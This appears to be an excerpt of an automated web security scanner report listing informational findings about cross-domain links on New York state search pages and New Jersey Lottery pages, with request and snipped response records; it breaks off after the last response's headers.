Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.search.state.ny.us/search?access=p&sort=date%3AD%3AL%3Ad1&output=xml_no_dtd&site=default_collection&client=nystate_frontend&proxystylesheet=nystate_frontend&proxycustom=<ADVANCED/>

The response contains the following links to other domains:

http://www.cio.ny.gov/
http://www.google-analytics.com/urchin.js
http://www.ny.gov/
http://www.ny.gov/contactus/index.html
http://www.ny.gov/disclaimer/index.html
http://www.ny.gov/howdoi/index.html
http://www.ny.gov/images/pg2slice_18a.gif
http://www.ny.gov/nysbannerpics/banner_img1.png
http://www.ny.gov/nysbannerpics/banner_img2.png
http://www.ny.gov/nysbannerpics/banner_img3.png
http://www.ny.gov/privacy/index.html
http://www.nysegov.com/citGuide.cfm?superCat=102
http://www.nysegov.com/citGuide.cfm?superCat=102&cat=449&content=main
http://www.nysegov.com/citGuide.cfm?superCat=106
http://www.nysegov.com/citGuide.cfm?superCat=119
http://www.nysegov.com/citGuide.cfm?superCat=129
http://www.nysegov.com/citGuide.cfm?superCat=142
http://www.nysegov.com/citGuide.cfm?superCat=178
http://www.nysegov.com/citGuide.cfm?superCat=212
http://www.nysegov.com/citGuide.cfm?superCat=219
http://www.nysegov.com/citGuide.cfm?superCat=245
http://www.nysegov.com/citGuide.cfm?superCat=28
http://www.nysegov.com/citGuide.cfm?superCat=36
http://www.nysegov.com/citGuide.cfm?superCat=396
http://www.nysegov.com/citGuide.cfm?superCat=64
http://www.nysegov.com/citGuide.cfm?superCat=82
http://www.nysegov.com/images/advancesearch_2005.gif
http://www.nysegov.com/images/advancesearchhelp_2005.gif
http://www.nysegov.com/images/pg2slice_03.gif
http://www.nysegov.com/images/pg2slice_04.gif
http://www.nysegov.com/images/pg2slice_05.gif
http://www.nysegov.com/images/pg2slice_06.gif
http://www.nysegov.com/images/pg2slice_09.gif
http://www.nysegov.com/images/pg2slice_10.gif
http://www.nysegov.com/images/pg2slice_11.gif
http://www.nysegov.com/images/pg2slice_12.gif
http://www.nysegov.com/images/pg2slice_13.gif
http://www.nysegov.com/images/pg2slice_14.gif
http://www.nysegov.com/images/pg2slice_15.gif
http://www.nysegov.com/images/pg2slice_16.gif
http://www.nysegov.com/images/pg2slice_17.gif
http://www.nysegov.com/images/pg2slice_18.gif
http://www.nysegov.com/images/searchnys_2005.gif
http://www.nysegov.com/images/webCastLink.gif
http://www.nysegov.com/leftMenu.js
http://www.nysegov.com/nysbanner.css
http://www.nysegov.com/searchtips.cfm
http://www.nysegov.com/tops/2leveltop_2.gif
http://www.nysegov.com/webcast.cfm
http://www.nysegov.com/wireframe.css

Request

GET /search?access=p&sort=date%3AD%3AL%3Ad1&output=xml_no_dtd&site=default_collection&client=nystate_frontend&proxystylesheet=nystate_frontend&proxycustom=<ADVANCED/> HTTP/1.1
Host: www.search.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Connection: Close
Content-Type: text/html
Cache-Control: public, max-age=31622400
Expires: Fri, 13 Jul 2012 01:50:17 GMT
Content-Length: 32574

<html><head>
<link rel="STYLESHEET" type="text/css" href="http://www.nysegov.com/wireframe.css" media="screen">
<link rel="STYLESHEET" type="text/css" href="http://www.nysegov.com/nysbanner.css" media="screen"><script language="JavaScript" type="text/javascript" src="http://www.nysegov.com/leftMenu.js"></script>
...[SNIP]...
<body onload="setFocus()" dir="ltr"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
<div style="height: 28px; background-color: #003366;border:#999 1px solid;width:754px ">
<a href="http://www.ny.gov/"><img style="float: left; border:none;" src="http://www.ny.gov/nysbannerpics/banner_img1.png"
alt="NY.gov Portal" /></a>
<a href="http://www.nysegov.com/citGuide.cfm?superCat=102&cat=449&content=main"><img style="float: left;border:none;"
src="http://www.ny.gov/nysbannerpics/banner_img2.png" alt="State Agency Listing" /></a>
...[SNIP]...
<a href="#" onclick="document.getElementById('sw_searchbox').style.visibility= 'visible'; document.getElementById('searchgraphic').style.visibility=
'hidden';"><img id="searchgraphic" style="float: right; border:none;visibility: hidden;" src="http://www.ny.gov/nysbannerpics/banner_img3.png"
alt="Search all of NY.gov" /></a>
...[SNIP]...
<td colspan="2" class="topgrid" align="right"><img src="http://www.nysegov.com/tops/2leveltop_2.gif" width="555" height="70"
alt="New York Vista" /></td>
...[SNIP]...
<input value="default_collection" name="site" type="hidden"><a href="http://www.nysegov.com/citGuide.cfm?superCat=28" onmouseover="changeImages('pg2slice_03', 'http://www.nysegov.com/images/pg2slice_03-over.gif'); return true;" onmouseout="changeImages('pg2slice_03', 'http://www.nysegov.com/images/pg2slice_03.gif'); return true;" onmousedown="changeImages('pg2slice_03', 'http://www.nysegov.com/images/pg2slice_03-over.gif'); return true;" onmouseup="changeImages('pg2slice_03', 'http://www.nysegov.com/images/pg2slice_03-over.gif'); return true;"><img name="pg2slice_03" src="http://www.nysegov.com/images/pg2slice_03.gif" width="188" height="19" border="0" alt="Business"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=64" onmouseover="changeImages('pg2slice_04', 'http://www.nysegov.com/images/pg2slice_04-over.gif'); return true;" onmouseout="changeImages('pg2slice_04', 'http://www.nysegov.com/images/pg2slice_04.gif'); return true;" onmousedown="changeImages('pg2slice_04', 'http://www.nysegov.com/images/pg2slice_04-over.gif'); return true;" onmouseup="changeImages('pg2slice_04', 'http://www.nysegov.com/images/pg2slice_04-over.gif'); return true;"><img name="pg2slice_04" src="http://www.nysegov.com/images/pg2slice_04.gif" width="188" height="18" border="0" alt="Education"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=82" onmouseover="changeImages('pg2slice_05', 'http://www.nysegov.com/images/pg2slice_05-over.gif'); return true;" onmouseout="changeImages('pg2slice_05', 'http://www.nysegov.com/images/pg2slice_05.gif'); return true;" onmousedown="changeImages('pg2slice_05', 'http://www.nysegov.com/images/pg2slice_05-over.gif'); return true;" onmouseup="changeImages('pg2slice_05', 'http://www.nysegov.com/images/pg2slice_05-over.gif'); return true;"><img name="pg2slice_05" src="http://www.nysegov.com/images/pg2slice_05.gif" width="188" height="19" border="0" alt="Family"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=106" onmouseover="changeImages('pg2slice_06', 'http://www.nysegov.com/images/pg2slice_06-over.gif'); return true;" onmouseout="changeImages('pg2slice_06', 'http://www.nysegov.com/images/pg2slice_06.gif'); return true;" onmousedown="changeImages('pg2slice_06', 'http://www.nysegov.com/images/pg2slice_06-over.gif'); return true;" onmouseup="changeImages('pg2slice_06', 'http://www.nysegov.com/images/pg2slice_06-over.gif'); return true;"><img name="pg2slice_06" src="http://www.nysegov.com/images/pg2slice_06.gif" width="188" height="16" border="0" alt="Health"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=129" onmouseover="changeImages('pg2slice_09', 'http://www.nysegov.com/images/pg2slice_09-over.gif'); return true;" onmouseout="changeImages('pg2slice_09', 'http://www.nysegov.com/images/pg2slice_09.gif'); return true;" onmousedown="changeImages('pg2slice_09', 'http://www.nysegov.com/images/pg2slice_09-over.gif'); return true;" onmouseup="changeImages('pg2slice_09', 'http://www.nysegov.com/images/pg2slice_09-over.gif'); return true;"><img name="pg2slice_09" src="http://www.nysegov.com/images/pg2slice_09.gif" width="188" height="18" border="0" alt="Law and Order"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=245" onmouseover="changeImages('pg2slice_10', 'http://www.nysegov.com/images/pg2slice_10-over.gif'); return true;" onmouseout="changeImages('pg2slice_10', 'http://www.nysegov.com/images/pg2slice_10.gif'); return true;" onmousedown="changeImages('pg2slice_10', 'http://www.nysegov.com/images/pg2slice_10-over.gif'); return true;" onmouseup="changeImages('pg2slice_10', 'http://www.nysegov.com/images/pg2slice_10-over.gif'); return true;"><img name="pg2slice_10" src="http://www.nysegov.com/images/pg2slice_10.gif" width="188" height="19" border="0" alt="Consumer Info"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=396" onmouseover="changeImages('pg2slice_11', 'http://www.nysegov.com/images/pg2slice_11-over.gif'); return true;" onmouseout="changeImages('pg2slice_11', 'http://www.nysegov.com/images/pg2slice_11.gif'); return true;" onmousedown="changeImages('pg2slice_11', 'http://www.nysegov.com/images/pg2slice_11-over.gif'); return true;" onmouseup="changeImages('pg2slice_11', 'http://www.nysegov.com/images/pg2slice_11-over.gif'); return true;"><img name="pg2slice_11" src="http://www.nysegov.com/images/pg2slice_11.gif" width="188" height="18" border="0" alt="Environment"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=102" onmouseover="changeImages('pg2slice_12', 'http://www.nysegov.com/images/pg2slice_12-over.gif'); return true;" onmouseout="changeImages('pg2slice_12', 'http://www.nysegov.com/images/pg2slice_12.gif'); return true;" onmousedown="changeImages('pg2slice_12', 'http://www.nysegov.com/images/pg2slice_12-over.gif'); return true;" onmouseup="changeImages('pg2slice_12', 'http://www.nysegov.com/images/pg2slice_12-over.gif'); return true;"><img name="pg2slice_12" src="http://www.nysegov.com/images/pg2slice_12.gif" width="188" height="18" border="0" alt="Government"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=119" onmouseover="changeImages('pg2slice_13', 'http://www.nysegov.com/images/pg2slice_13-over.gif'); return true;" onmouseout="changeImages('pg2slice_13', 'http://www.nysegov.com/images/pg2slice_13.gif'); return true;" onmousedown="changeImages('pg2slice_13', 'http://www.nysegov.com/images/pg2slice_13-over.gif'); return true;" onmouseup="changeImages('pg2slice_13', 'http://www.nysegov.com/images/pg2slice_13-over.gif'); return true;"><img name="pg2slice_13" src="http://www.nysegov.com/images/pg2slice_13.gif" width="188" height="18" border="0" alt="Housing"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=219" onmouseover="changeImages('pg2slice_14', 'http://www.nysegov.com/images/pg2slice_14-over.gif'); return true;" onmouseout="changeImages('pg2slice_14', 'http://www.nysegov.com/images/pg2slice_14.gif'); return true;" onmousedown="changeImages('pg2slice_14', 'http://www.nysegov.com/images/pg2slice_14-over.gif'); return true;" onmouseup="changeImages('pg2slice_14', 'http://www.nysegov.com/images/pg2slice_14-over.gif'); return true;"><img name="pg2slice_14" src="http://www.nysegov.com/images/pg2slice_14.gif" width="188" height="18" border="0" alt="Transportation"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=36" onmouseover="changeImages('pg2slice_15', 'http://www.nysegov.com/images/pg2slice_15-over.gif'); return true;" onmouseout="changeImages('pg2slice_15', 'http://www.nysegov.com/images/pg2slice_15.gif'); return true;" onmousedown="changeImages('pg2slice_15', 'http://www.nysegov.com/images/pg2slice_15-over.gif'); return true;" onmouseup="changeImages('pg2slice_15', 'http://www.nysegov.com/images/pg2slice_15-over.gif'); return true;"><img name="pg2slice_15" src="http://www.nysegov.com/images/pg2slice_15.gif" width="188" height="18" border="0" alt="Career / Employment"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=142" onmouseover="changeImages('pg2slice_16', 'http://www.nysegov.com/images/pg2slice_16-over.gif'); return true;" onmouseout="changeImages('pg2slice_16', 'http://www.nysegov.com/images/pg2slice_16.gif'); return true;" onmousedown="changeImages('pg2slice_16', 'http://www.nysegov.com/images/pg2slice_16-over.gif'); return true;" onmouseup="changeImages('pg2slice_16', 'http://www.nysegov.com/images/pg2slice_16-over.gif'); return true;"><img name="pg2slice_16" src="http://www.nysegov.com/images/pg2slice_16.gif" width="188" height="17" border="0" alt="Licenses & Credentials"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=178" onmouseover="changeImages('pg2slice_17', 'http://www.nysegov.com/images/pg2slice_17-over.gif'); return true;" onmouseout="changeImages('pg2slice_17', 'http://www.nysegov.com/images/pg2slice_17.gif'); return true;" onmousedown="changeImages('pg2slice_17', 'http://www.nysegov.com/images/pg2slice_17-over.gif'); return true;" onmouseup="changeImages('pg2slice_17', 'http://www.nysegov.com/images/pg2slice_17-over.gif'); return true;"><img name="pg2slice_17" src="http://www.nysegov.com/images/pg2slice_17.gif" width="188" height="20" border="0" alt="Recreation / Tourism"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=212" onmouseover="changeImages('pg2slice_18', 'http://www.nysegov.com/images/pg2slice_18-over.gif'); return true;" onmouseout="changeImages('pg2slice_18', 'http://www.nysegov.com/images/pg2slice_18.gif'); return true;" onmousedown="changeImages('pg2slice_18', 'http://www.nysegov.com/images/pg2slice_18-over.gif'); return true;" onmouseup="changeImages('pg2slice_18', 'http://www.nysegov.com/images/pg2slice_18-over.gif'); return true;"><img name="pg2slice_18" src="http://www.nysegov.com/images/pg2slice_18.gif" width="188" height="19" border="0" alt="Tax Information"></a><br><a href="http://www.ny.gov/howdoi/index.html" onMouseOver="changeImages('pg2slice_18a', 'http://www.ny.gov/images/pg2slice_18b-over.gif'); return true;" onMouseOut="changeImages('pg2slice_18a', 'http://www.ny.gov/images/pg2slice_18a.gif'); return true;"><img id="pg2slice_18a" src="http://www.ny.gov/images/pg2slice_18a.gif" height="19" width="188" alt="How Do I?" border="0"></a><br><a href="http://www.nysegov.com/webcast.cfm" onMouseOver="changeImages('webcastLinkImage','http://www.nysegov.com/images/webCastLink_over.gif'); return true;" onMouseOut="changeImages('webcastLinkImage', 'http://www.nysegov.com/images/webCastLink.gif'); return true;"><img id="webcastLinkImage" src="http://www.nysegov.com/images/webCastLink.gif" height="19" width="188" alt="Open Meeting Webcast" border="0"></a><div class="searchArea"><img src="http://www.nysegov.com/images/searchnys_2005.gif" alt="Search" width="122" height="11" style="border:none"><br>
...[SNIP]...
p&sort=date%3AD%3AL%3Ad1&output=xml_no_dtd&site=default_collection&client=default_frontend&proxystylesheet=default_frontend&proxycustom=%3cADVANCED/%3e" title="Advanced Search"><img src="http://www.nysegov.com/images/advancesearch_2005.gif" width="101" height="11" alt="" border="0"></a><a class="menuLink" title="Help" href="http://www.nysegov.com/searchtips.cfm"><img src="http://www.nysegov.com/images/advancesearchhelp_2005.gif" width="27" height="11" alt="" border="0"></a>
...[SNIP]...
<td align="right" colspan = "2" class="bottomgrid" style="color:#DEDEDC" valign="bottom">
           <a href="http://www.cio.ny.gov/" title="NYS OFT" style="background-color:#516D8B;color:white;text-decoration:none;">
       Search provided by NYS Office for Technology</a>
       |
       <a href="http://www.ny.gov" title="NYS Home Page" style="background-color:#516D8B;color:white;text-decoration:none;">NYS
Home Page</a>
       |
       <a href="http://www.ny.gov/contactus/index.html" title="Contact Us" style="background-color:#516D8B;color:white;text-decoration:none;">Contact
Us</a>
       |
       <a href="http://www.ny.gov/privacy/index.html" title="Privacy Policy" style="background-color:#516D8B;color:white;text-decoration:none;">Privacy
Policy</a>
       |
       <a href="http://www.ny.gov/disclaimer/index.html" title="Disclaimer" style="background-color:#516D8B;color:white;text-decoration:none;">Disclaimer</a>
...[SNIP]...

12.19. http://www.state.nj.us/lottery/about/6-0_about.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/about/6-0_about.htm

Issue detail

The page was loaded from a URL containing a query string:

http://www.state.nj.us/lottery/about/6-0_about.htm?1

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js
http://maps.google.com/maps?q=One+Lawrence+Park+Complex+Brunswick+Avenue+Circle+Lawrenceville,+NJ+08648&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=wl
http://twitter.com/
http://www.800gambler.org/
http://www.facebook.com/NewJerseyLottery
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js
http://www.youtube.com/newjerseylottery

Request

GET /lottery/about/6-0_about.htm?1 HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:25 GMT
Content-length: 48579
Content-type: text/html
Last-modified: Fri, 01 Jul 2011 11:52:45 GMT
Etag: "bdc3-4e0db50d"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>

<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...
<p align="center">
<a href="http://maps.google.com/maps?q=One+Lawrence+Park+Complex+Brunswick+Avenue+Circle+Lawrenceville,+NJ+08648&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=wl" target="_blank"><img src="../images/about/contact_map.gif" height="259" width="328">
...[SNIP]...
<strong>If you think you or someone you know has a gambling problem, help is available in New Jersey 24 hour a day...every day! Call <a href="http://www.800gambler.org/" target="_blank"><u>
...[SNIP]...
<div class="facebook-feed">
<a class="clear-link" href="http://www.facebook.com/NewJerseyLottery"></a>
...[SNIP]...
</div>
<a href="http://twitter.com/#!/TheNJLottery"><img class="twitter" src="../images/sitewide/icon-twitter.png" width="61" height="76" alt="Twitter" />
...[SNIP]...
<br />
<a href="http://www.youtube.com/newjerseylottery"><img class="youtube" src="../images/sitewide/icon-youtube.png" width="61" height="79" alt="YouTube" />
...[SNIP]...

12.20. http://www.state.nj.us/lottery/didiwin/8-0_did_i_win.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/didiwin/8-0_did_i_win.htm

Issue detail

The page was loaded from a URL containing a query string:

http://www.state.nj.us/lottery/didiwin/8-0_did_i_win.htm?1

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js
http://twitter.com/
http://www.facebook.com/NewJerseyLottery
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js
http://www.ustream.tv/
http://www.ustream.tv/flash/viewer.swf
http://www.ustream.tv/user/njlottery/videos
http://www.youtube.com/newjerseylottery

Request

GET /lottery/didiwin/8-0_did_i_win.htm?1 HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:28 GMT
Content-length: 20646
Content-type: text/html
Last-modified: Tue, 12 Jul 2011 15:29:01 GMT
Etag: "50a6-4e1c683d"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>

<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...
<param name="movie" value="http://www.ustream.tv/flash/viewer.swf"/>
<embed flashvars="autoplay=ture&brand=embed&cid=8382854&v3=1" width="480" height="296" allowfullscreen="true" allowscriptaccess="always" id="utv741572" name="utv_n_717400" src="http://www.ustream.tv/flash/viewer.swf" type="application/x-shockwave-flash" />
</object><br />
<a href="http://www.ustream.tv/" style="padding: 2px 0px 4px; width: 400px; background: #ffffff; display: block; color: #000000; font-weight: normal; font-size: 10px; text-decoration: underline; text-align: center;" target="_blank">Live Broadcast by Ustream.TV</a>
...[SNIP]...
<p align="left"><a href="http://www.ustream.tv/user/njlottery/videos" target="_blank">View previous New Jersey Lottery Drawings here</a>
...[SNIP]...
<div class="facebook-feed">
<a class="clear-link" href="http://www.facebook.com/NewJerseyLottery"></a>
...[SNIP]...
</div>
<a href="http://twitter.com/#!/TheNJLottery"><img class="twitter" src="../images/sitewide/icon-twitter.png" width="61" height="76" alt="Twitter" />
...[SNIP]...
<br />
<a href="http://www.youtube.com/newjerseylottery"><img class="youtube" src="../images/sitewide/icon-youtube.png" width="61" height="79" alt="YouTube" />
...[SNIP]...

12.21. http://www.state.nj.us/lottery/instant/2-0_instant_games.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/instant/2-0_instant_games.shtml

Issue detail

The page was loaded from a URL containing a query string:

http://www.state.nj.us/lottery/instant/2-0_instant_games.shtml?1

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js
http://twitter.com/
http://www.facebook.com/NewJerseyLottery
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js
http://www.youtube.com/newjerseylottery

Request

GET /lottery/instant/2-0_instant_games.shtml?1 HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:21 GMT
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>

<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...
<div class="facebook-feed">
<a class="clear-link" href="http://www.facebook.com/NewJerseyLottery"></a>
...[SNIP]...
</div>
<a href="http://twitter.com/#!/TheNJLottery"><img class="twitter" src="../images/sitewide/icon-twitter.png" width="61" height="76" alt="Twitter" />
...[SNIP]...
<br />
<a href="http://www.youtube.com/newjerseylottery"><img class="youtube" src="../images/sitewide/icon-youtube.png" width="61" height="79" alt="YouTube" />
...[SNIP]...

12.22. http://www.state.nj.us/lottery/multimedia/9-0_multimedia.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/multimedia/9-0_multimedia.htm

Issue detail

The page was loaded from a URL containing a query string:

http://www.state.nj.us/lottery/multimedia/9-0_multimedia.htm?2

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js
http://twitter.com/
http://www.facebook.com/NewJerseyLottery
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js
http://www.youtube.com/embed/5hDSogD8t3U?rel=0
http://www.youtube.com/newjerseylottery

Request

GET /lottery/multimedia/9-0_multimedia.htm?2 HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:29 GMT
Content-length: 47620
Content-type: text/html
Last-modified: Fri, 01 Jul 2011 12:04:04 GMT
Etag: "ba04-4e0db7b4"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>

<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...
<div id="video">
<iframe width="560" height="349" src="http://www.youtube.com/embed/5hDSogD8t3U?rel=0" frameborder="0" allowfullscreen></iframe>
...[SNIP]...
<div class="facebook-feed">
<a class="clear-link" href="http://www.facebook.com/NewJerseyLottery"></a>
...[SNIP]...
</div>
<a href="http://twitter.com/#!/TheNJLottery"><img class="twitter" src="../images/sitewide/icon-twitter.png" width="61" height="76" alt="Twitter" />
...[SNIP]...
<br />
<a href="http://www.youtube.com/newjerseylottery"><img class="youtube" src="../images/sitewide/icon-youtube.png" width="61" height="79" alt="YouTube" />
...[SNIP]...

12.23. http://www.state.nj.us/lottery/news/5-0_news.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/news/5-0_news.htm

Issue detail

The page was loaded from a URL containing a query string:

http://www.state.nj.us/lottery/news/5-0_news.htm?2

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js
http://twitter.com/
http://www.facebook.com/NewJerseyLottery
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js
http://www.youtube.com/newjerseylottery

Request

GET /lottery/news/5-0_news.htm?2 HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:18 GMT
Content-length: 41359
Content-type: text/html
Last-modified: Tue, 12 Jul 2011 12:32:44 GMT
Etag: "a18f-4e1c3eec"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>

<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...
<div class="facebook-feed">
<a class="clear-link" href="http://www.facebook.com/NewJerseyLottery"></a>
...[SNIP]...
</div>
<a href="http://twitter.com/#!/TheNJLottery"><img class="twitter" src="../images/sitewide/icon-twitter.png" width="61" height="76" alt="Twitter" />
...[SNIP]...
<br />
<a href="http://www.youtube.com/newjerseylottery"><img class="youtube" src="../images/sitewide/icon-youtube.png" width="61" height="79" alt="YouTube" />
...[SNIP]...

12.24. http://www.state.nj.us/lottery/retailer/7-0_retailer.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/lottery/retailer/7-0_retailer.htm

Issue detail

The page was loaded from a URL containing a query string:

http://www.state.nj.us/lottery/retailer/7-0_retailer.htm?1

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js
http://twitter.com/
http://www.facebook.com/NewJerseyLottery
http://www.google.com/jsapi?key=notsupplied-wizard
http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js
http://www.youtube.com/newjerseylottery

Request

GET /lottery/retailer/7-0_retailer.htm?1 HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:27 GMT
Content-length: 13612
Content-type: text/html
Last-modified: Wed, 06 Jul 2011 17:28:57 GMT
Etag: "352c-4e149b59"
Accept-ranges: bytes
Connection: close

